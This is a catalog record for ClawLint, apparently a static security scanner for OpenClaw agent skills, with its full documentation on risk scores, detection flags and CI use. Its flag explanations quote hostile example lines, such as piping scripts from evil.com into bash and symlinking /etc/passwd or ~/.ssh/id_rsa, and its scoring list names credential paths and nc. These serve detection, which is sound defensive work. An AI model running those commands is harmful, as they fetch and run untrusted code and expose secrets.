{ "schemaVersion": "1.0", "item": { "slug": "claw-lint", "name": "Claw-lint", "source": "tencent", "type": "skill", "category": "安全合规", "sourceUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint", "canonicalUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint", "targetPlatform": "OpenClaw" }, "install": { "downloadMode": "redirect", "downloadUrl": "/downloads/claw-lint", "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=claw-lint", "sourcePlatform": "tencent", "targetPlatform": "OpenClaw", "installMethod": "Manual import", "extraction": "Extract archive", "prerequisites": [ "OpenClaw" ], "packageFormat": "ZIP package", "includedAssets": [ ".gitignore", "SKILL.md", "bin/claw-lint.sh" ], "primaryDoc": "SKILL.md", "quickSetup": [ "Download the package from Yavira.", "Extract the archive and review SKILL.md first.", "Import or place the package into your OpenClaw setup." ], "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run." } ] }, "sourceHealth": { "source": "tencent", "status": "healthy", "reason": "direct_download_ok", "recommendedAction": "download", "checkedAt": "2026-04-23T16:43:11.935Z", "expiresAt": "2026-04-30T16:43:11.935Z", "httpStatus": 200, "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard", "contentType": "application/zip", "probeMethod": "head", "details": { "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard", "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"", "redirectLocation": null, "bodySnippet": null }, "scope": "source", "summary": "Source download looks usable.", "detail": "Yavira can redirect you to the upstream package for this source.", "primaryActionLabel": "Download for OpenClaw", "primaryActionHref": "/downloads/claw-lint" }, "validation": { "installChecklist": [ "Use the Yavira download entry.", "Review SKILL.md after the package is downloaded.", "Confirm the extracted package contains the expected setup assets." ], "postInstallChecks": [ "Confirm the extracted package includes the expected docs or setup files.", "Validate the skill or prompts are available in your target agent workspace.", "Capture any manual follow-up steps the agent could not complete." ] }, "downloadPageUrl": "https://openagent3.xyz/downloads/claw-lint", "agentPageUrl": "https://openagent3.xyz/skills/claw-lint/agent", "manifestUrl": "https://openagent3.xyz/skills/claw-lint/agent.json", "briefUrl": "https://openagent3.xyz/skills/claw-lint/agent.md" }, "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run." } ] }, "documentation": { "source": "clawhub", "primaryDoc": "SKILL.md", "sections": [ { "title": "ClawLint", "body": "Security linter for OpenClaw skills\n\nRuns a local audit over your installed OpenClaw skills without executing any code. Scans both workspace (~/.openclaw/workspace/skills) and system (~/.openclaw/skills) directories.\n\nWith 7.1% of ClawHub skills containing security flaws, ClawLint provides pre-execution defense by identifying malicious patterns before they run." }, { "title": "Summary", "body": "ClawLint audits OpenClaw skills for security threats without executing code. It detects malicious patterns like remote execution, credential theft, and backdoors, then assigns risk scores (0-100) and generates SHA256 hashes for integrity monitoring. Outputs JSON for automation and CI/CD pipelines." }, { "title": "What It Does", "body": "Risk scoring — assigns a numeric risk score (0-100) based on detected patterns\nAudit flags — identifies suspicious behaviors (remote execution, secret access, etc.)\nInventory mode — optional SHA256 hashing of all files for change detection\nJSON output — machine-readable results (requires Python 3)\nNo execution — static analysis only, safe to run on untrusted skills" }, { "title": "Scan all skills (summary view)", "body": "{baseDir}/bin/claw-lint.sh" }, { "title": "Scan one specific skill", "body": "{baseDir}/bin/claw-lint.sh --skill \n\nExample: {baseDir}/bin/claw-lint.sh --skill hashnode-publisher" }, { "title": "Full inventory with SHA256 hashes", "body": "{baseDir}/bin/claw-lint.sh --full --skill " }, { "title": "JSON output (requires Python 3)", "body": "{baseDir}/bin/claw-lint.sh --format json" }, { "title": "Options", "body": "FlagDescription--skill Scan only the specified skill--fullInclude SHA256 inventory of all files--format jsonOutput as JSON (needs python3)--min-score Show only skills with risk score ≥ N--strictPrioritize high-severity patterns--max-bytes Skip files larger than N bytes (default: 2MB)" }, { "title": "Risk Score", "body": "0-30: Low risk (common patterns, minimal concerns)\n31-60: Medium risk (network access, file operations)\n61-100: High risk (remote execution, credential access, system tampering)" }, { "title": "Common Flags", "body": "pipes_remote_to_shell — downloads and executes remote code\ndownloads_remote_content — fetches external files\nhas_executables — contains binary files\nuses_ssh_or_scp — SSH/SCP operations\ncontains_symlinks — symbolic links present" }, { "title": "Example Output", "body": "SCORE SKILL FILES SIZE FLAGS\n----- ----- ----- ---- -----\n57 hashnode-publisher 2 1.1KB downloads_remote_content,pipes_remote_to_shell\n45 ec2-health-monitor 2 1.9KB pipes_remote_to_shell" }, { "title": "Risk Scoring Details", "body": "ClawLint assigns risk scores from 0 (safe) to 100 (critical) based on pattern detection:\n\nScore RangeClassificationDescription0-20Low RiskStandard file operations, no suspicious patterns21-50Medium RiskNetwork calls or external dependencies detected51-80High RiskMultiple suspicious patterns or obfuscation detected81-100CriticalRemote execution, secret access, or privilege escalation" }, { "title": "Scoring Factors", "body": "+25 points: Remote execution patterns (curl | bash, wget -O-, nc)\n+30 points: Secret/credential access (~/.openclaw/credentials, ~/.ssh/)\n+20 points: Privilege escalation (sudo, setuid, chmod +s)\n+15 points: Code obfuscation (base64 decode, eval, exec in suspicious contexts)\n+10 points: External network calls (curl, wget, http requests)\n+10 points: File system operations outside skill directory\n+5 points: Use of /tmp or world-writable directories" }, { "title": "pipes_remote_to_shell", "body": "Downloads and executes external code without verification.\n\nExamples:\n\ncurl https://evil.com/script.sh | bash\nwget -O- https://malicious.site/payload | sh\n\nRisk: Critical. Remote code execution vector for malware." }, { "title": "downloads_remote_content", "body": "Fetches external files or data from the internet.\n\nExamples:\n\ncurl -O https://example.com/file.tar.gz\nwget https://cdn.example.com/data.json\n\nRisk: Medium-High. Potential supply chain attack or data exfiltration." }, { "title": "has_executables", "body": "Contains compiled binary files (not shell scripts).\n\nExamples:\n\nELF binaries\nCompiled programs\n\nRisk: Medium. Harder to audit, may contain hidden functionality." }, { "title": "uses_ssh_or_scp", "body": "Performs SSH/SCP operations.\n\nExamples:\n\nssh user@remote.host \"command\"\nscp file.txt user@remote:/path/\n\nRisk: Medium. Potential for unauthorized remote access or data transfer." }, { "title": "contains_symlinks", "body": "Includes symbolic links that may point outside skill directory.\n\nExamples:\n\nln -s /etc/passwd exposed_file\nln -s ~/.ssh/id_rsa key_link\n\nRisk: Low-Medium. May expose sensitive files or create confusion." }, { "title": "Requirements", "body": "Bash 4.0+\nStandard Unix tools: find, grep, awk, sha256sum, stat\nPython 3 (optional, for JSON output only)\n\nWorks on Ubuntu/Debian without sudo. Designed for EC2 and similar environments." }, { "title": "Why Use This?", "body": "Audit skills before installation\nDetect backdoors or malicious patterns in community skills\nTrack changes to installed skills with SHA256 inventory\nEnforce security policies in automated pipelines" }, { "title": "Terminal Output (Default)", "body": "Human-readable table format with color-coded risk scores (when terminal supports colors)." }, { "title": "JSON Output (--format json)", "body": "Machine-readable structure for integration with CI/CD pipelines:\n\n{\n \"scan_date\": \"2026-02-13T14:50:00Z\",\n \"skills_scanned\": 12,\n \"high_risk_count\": 2,\n \"results\": [\n {\n \"skill_name\": \"hashnode-publisher\",\n \"risk_score\": 57,\n \"file_count\": 2,\n \"total_size\": \"1.1KB\",\n \"flags\": [\"downloads_remote_content\", \"pipes_remote_to_shell\"],\n \"files\": [\n {\n \"path\": \"bin/publish.sh\",\n \"sha256\": \"a1b2c3d4...\",\n \"size\": 896\n }\n ]\n }\n ]\n}" }, { "title": "Regular Audits", "body": "Run ClawLint after installing or updating skills:\n\n{baseDir}/bin/claw-lint.sh --min-score 50" }, { "title": "Baseline Inventory", "body": "Create a security baseline for production environments:\n\n{baseDir}/bin/claw-lint.sh --full --format json > baseline.json\n\nRe-run periodically and diff against baseline to detect tampering." }, { "title": "CI/CD Integration", "body": "Add to your deployment pipeline:\n\n# Fail build if any skill scores above 60\n{baseDir}/bin/claw-lint.sh --format json | python3 -c \"\nimport json, sys\ndata = json.load(sys.stdin)\nhigh_risk = [s for s in data['results'] if s['risk_score'] > 60]\nif high_risk:\n print(f'❌ {len(high_risk)} high-risk skills detected')\n sys.exit(1)\n\"" }, { "title": "Whitelist Trusted Skills", "body": "For known-safe skills with legitimate flags, document exceptions:\n\n# Example: hashnode-publisher needs network access\n{baseDir}/bin/claw-lint.sh --skill hashnode-publisher\n# Expected score: 45-60 (downloads_remote_content is legitimate)" }, { "title": "Limitations", "body": "Static analysis only — cannot detect runtime behavior or dynamically generated code\nPattern-based — may have false positives for legitimate use cases\nNo sandbox — does not execute or test skills\nLocal files only — scans installed skills, not ClawHub packages before install\n\nFor comprehensive security, combine ClawLint with:\n\nManual code review for critical skills\nVirusTotal scanning for executables\nRuntime monitoring and sandboxing\nRegular security updates" }, { "title": "Contributing", "body": "Report false positives or suggest new detection patterns at the OpenClaw security repository." }, { "title": "License", "body": "MIT License - Free to use, modify, and distribute." } ], "body": "ClawLint\n\nSecurity linter for OpenClaw skills\n\nRuns a local audit over your installed OpenClaw skills without executing any code. Scans both workspace (~/.openclaw/workspace/skills) and system (~/.openclaw/skills) directories.\n\nWith 7.1% of ClawHub skills containing security flaws, ClawLint provides pre-execution defense by identifying malicious patterns before they run.\n\nSummary\n\nClawLint audits OpenClaw skills for security threats without executing code. It detects malicious patterns like remote execution, credential theft, and backdoors, then assigns risk scores (0-100) and generates SHA256 hashes for integrity monitoring. Outputs JSON for automation and CI/CD pipelines.\n\nWhat It Does\nRisk scoring — assigns a numeric risk score (0-100) based on detected patterns\nAudit flags — identifies suspicious behaviors (remote execution, secret access, etc.)\nInventory mode — optional SHA256 hashing of all files for change detection\nJSON output — machine-readable results (requires Python 3)\nNo execution — static analysis only, safe to run on untrusted skills\nQuick Start\nScan all skills (summary view)\n{baseDir}/bin/claw-lint.sh\n\nScan one specific skill\n{baseDir}/bin/claw-lint.sh --skill \n\n\nExample: {baseDir}/bin/claw-lint.sh --skill hashnode-publisher\n\nFull inventory with SHA256 hashes\n{baseDir}/bin/claw-lint.sh --full --skill \n\nJSON output (requires Python 3)\n{baseDir}/bin/claw-lint.sh --format json\n\nOptions\nFlag\tDescription\n--skill \tScan only the specified skill\n--full\tInclude SHA256 inventory of all files\n--format json\tOutput as JSON (needs python3)\n--min-score \tShow only skills with risk score ≥ N\n--strict\tPrioritize high-severity patterns\n--max-bytes \tSkip files larger than N bytes (default: 2MB)\nUnderstanding the Output\nRisk Score\n0-30: Low risk (common patterns, minimal concerns)\n31-60: Medium risk (network access, file operations)\n61-100: High risk (remote execution, credential access, system tampering)\nCommon Flags\npipes_remote_to_shell — downloads and executes remote code\ndownloads_remote_content — fetches external files\nhas_executables — contains binary files\nuses_ssh_or_scp — SSH/SCP operations\ncontains_symlinks — symbolic links present\nExample Output\nSCORE SKILL FILES SIZE FLAGS\n----- ----- ----- ---- -----\n57 hashnode-publisher 2 1.1KB downloads_remote_content,pipes_remote_to_shell\n45 ec2-health-monitor 2 1.9KB pipes_remote_to_shell\n\nRisk Scoring Details\n\nClawLint assigns risk scores from 0 (safe) to 100 (critical) based on pattern detection:\n\nScore Range\tClassification\tDescription\n0-20\tLow Risk\tStandard file operations, no suspicious patterns\n21-50\tMedium Risk\tNetwork calls or external dependencies detected\n51-80\tHigh Risk\tMultiple suspicious patterns or obfuscation detected\n81-100\tCritical\tRemote execution, secret access, or privilege escalation\nScoring Factors\n+25 points: Remote execution patterns (curl | bash, wget -O-, nc)\n+30 points: Secret/credential access (~/.openclaw/credentials, ~/.ssh/)\n+20 points: Privilege escalation (sudo, setuid, chmod +s)\n+15 points: Code obfuscation (base64 decode, eval, exec in suspicious contexts)\n+10 points: External network calls (curl, wget, http requests)\n+10 points: File system operations outside skill directory\n+5 points: Use of /tmp or world-writable directories\nAudit Flags Explained\npipes_remote_to_shell\n\nDownloads and executes external code without verification.\n\nExamples:\n\ncurl https://evil.com/script.sh | bash\nwget -O- https://malicious.site/payload | sh\n\n\nRisk: Critical. Remote code execution vector for malware.\n\ndownloads_remote_content\n\nFetches external files or data from the internet.\n\nExamples:\n\ncurl -O https://example.com/file.tar.gz\nwget https://cdn.example.com/data.json\n\n\nRisk: Medium-High. Potential supply chain attack or data exfiltration.\n\nhas_executables\n\nContains compiled binary files (not shell scripts).\n\nExamples:\n\nELF binaries\nCompiled programs\n\nRisk: Medium. Harder to audit, may contain hidden functionality.\n\nuses_ssh_or_scp\n\nPerforms SSH/SCP operations.\n\nExamples:\n\nssh user@remote.host \"command\"\nscp file.txt user@remote:/path/\n\n\nRisk: Medium. Potential for unauthorized remote access or data transfer.\n\ncontains_symlinks\n\nIncludes symbolic links that may point outside skill directory.\n\nExamples:\n\nln -s /etc/passwd exposed_file\nln -s ~/.ssh/id_rsa key_link\n\n\nRisk: Low-Medium. May expose sensitive files or create confusion.\n\nRequirements\nBash 4.0+\nStandard Unix tools: find, grep, awk, sha256sum, stat\nPython 3 (optional, for JSON output only)\n\nWorks on Ubuntu/Debian without sudo. Designed for EC2 and similar environments.\n\nWhy Use This?\nAudit skills before installation\nDetect backdoors or malicious patterns in community skills\nTrack changes to installed skills with SHA256 inventory\nEnforce security policies in automated pipelines\nOutput Formats\nTerminal Output (Default)\n\nHuman-readable table format with color-coded risk scores (when terminal supports colors).\n\nJSON Output (--format json)\n\nMachine-readable structure for integration with CI/CD pipelines:\n\n{\n \"scan_date\": \"2026-02-13T14:50:00Z\",\n \"skills_scanned\": 12,\n \"high_risk_count\": 2,\n \"results\": [\n {\n \"skill_name\": \"hashnode-publisher\",\n \"risk_score\": 57,\n \"file_count\": 2,\n \"total_size\": \"1.1KB\",\n \"flags\": [\"downloads_remote_content\", \"pipes_remote_to_shell\"],\n \"files\": [\n {\n \"path\": \"bin/publish.sh\",\n \"sha256\": \"a1b2c3d4...\",\n \"size\": 896\n }\n ]\n }\n ]\n}\n\nBest Practices\nRegular Audits\n\nRun ClawLint after installing or updating skills:\n\n{baseDir}/bin/claw-lint.sh --min-score 50\n\nBaseline Inventory\n\nCreate a security baseline for production environments:\n\n{baseDir}/bin/claw-lint.sh --full --format json > baseline.json\n\n\nRe-run periodically and diff against baseline to detect tampering.\n\nCI/CD Integration\n\nAdd to your deployment pipeline:\n\n# Fail build if any skill scores above 60\n{baseDir}/bin/claw-lint.sh --format json | python3 -c \"\nimport json, sys\ndata = json.load(sys.stdin)\nhigh_risk = [s for s in data['results'] if s['risk_score'] > 60]\nif high_risk:\n print(f'❌ {len(high_risk)} high-risk skills detected')\n sys.exit(1)\n\"\n\nWhitelist Trusted Skills\n\nFor known-safe skills with legitimate flags, document exceptions:\n\n# Example: hashnode-publisher needs network access\n{baseDir}/bin/claw-lint.sh --skill hashnode-publisher\n# Expected score: 45-60 (downloads_remote_content is legitimate)\n\nLimitations\nStatic analysis only — cannot detect runtime behavior or dynamically generated code\nPattern-based — may have false positives for legitimate use cases\nNo sandbox — does not execute or test skills\nLocal files only — scans installed skills, not ClawHub packages before install\n\nFor comprehensive security, combine ClawLint with:\n\nManual code review for critical skills\nVirusTotal scanning for executables\nRuntime monitoring and sandboxing\nRegular security updates\nContributing\n\nReport false positives or suggest new detection patterns at the OpenClaw security repository.\n\nLicense\n\nMIT License - Free to use, modify, and distribute." }, "trust": { "sourceLabel": "tencent", "provenanceUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint", "publisherUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint", "owner": "ParthGhumatkar", "version": "1.0.4", "license": null, "verificationStatus": "Indexed source record" }, "links": { "detailUrl": "https://openagent3.xyz/skills/claw-lint", "downloadUrl": "https://openagent3.xyz/downloads/claw-lint", "agentUrl": "https://openagent3.xyz/skills/claw-lint/agent", "manifestUrl": "https://openagent3.xyz/skills/claw-lint/agent.json", "briefUrl": "https://openagent3.xyz/skills/claw-lint/agent.md" } }